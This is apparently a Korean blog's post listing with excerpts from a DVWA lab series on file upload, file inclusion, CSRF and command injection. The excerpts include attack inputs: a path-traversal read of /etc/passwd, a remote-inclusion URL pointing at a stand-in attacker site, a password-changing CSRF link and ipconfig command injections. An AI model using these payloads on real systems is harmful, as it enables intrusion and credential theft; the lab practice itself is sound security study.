본문 바로가기
반응형

전체 글254

DVWA 실습 5. File Upload (Low) Objective Execute any PHP function of your choosing on the target system (such as phpinfo() or system()) thanks to this file upload vulnerability. 파일업로드 취약점을 이용해 php 함수들을 실행해보는 것이 목적이다. 업로드할 php 파일의 코드는 아래와 같다. 2022. 5. 19.
DVWA 실습 4. File Inclusion (Low) 파일 인클루전의 2가지 유형에 대하여는 아래에서 공부할 수 있다. WSTG - Local File Inclusion WSTG - Remote File Inclusion LFI는 http://vulnerable_host/preview.php?file=../../../../etc/passwd 요런거 RFI는 http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicous_page 요런걸 뜻한다. 말 그대로 local 과 remote의 차이다. dvwa의 file inclusion 페이지는 아래와 같이 생겼다. 아래 file1, 2, 3.php를 하나씩 눌러보면 http://192.168.0.101/vulnerabilities/fi/?page=i.. 2022. 5. 19.
DVWA 실습 3. Cross Site Request Forgery (CSRF) (Low) CSRF에서는 비밀번호를 바꾸는 사이트가 나온다. 공백인 상태로 change를 누르면 비밀번호가 공백으로 변하면서 아래 링크로 접속 되는데, 이번에도 get 방식으로 인자들이 전달 된다... http://192.168.0.101/vulnerabilities/csrf/?password_new=&password_conf=&Change=Change 위 코드처럼 작성한 html 파일을 만들고, 접속을 시도해보면, 비밀번호가 바뀌었다고 뜬다. 실제로 로그인해보면 비밀번호가 공백에서 password로 바뀐 것을 알 수 있다. 2022. 5. 19.
DVWA 실습 2. Command Injection (Low) 해당 취약점에 대한 정보는 아래 링크를 통해 학습하였다. https://dreamhack.io/lecture/courses/187 한국어로 사용중인 윈도우에 dvwa를 설치해서 그런지, 핑 내용이 다 깨져서 보인다... https://chrome.google.com/webstore/detail/set-character-encoding/bpojelgakakmcfmjfilgdlmhefphglae 위 링크를 통해 인코딩을 해줄 수 있는 확장 프로그램을 설치하였다. 마우스 우클릭 후, Korean (EUC-KR)로 바꿔준 뒤, 새로고침 하면 아주 잘 보인다! 윈도우 서버는 처음이라, 커맨드가 입력되는지만 확인을 해보았다. google.com && ipconfig 또는 google.com || ipconfig 이.. 2022. 5. 19.
반응형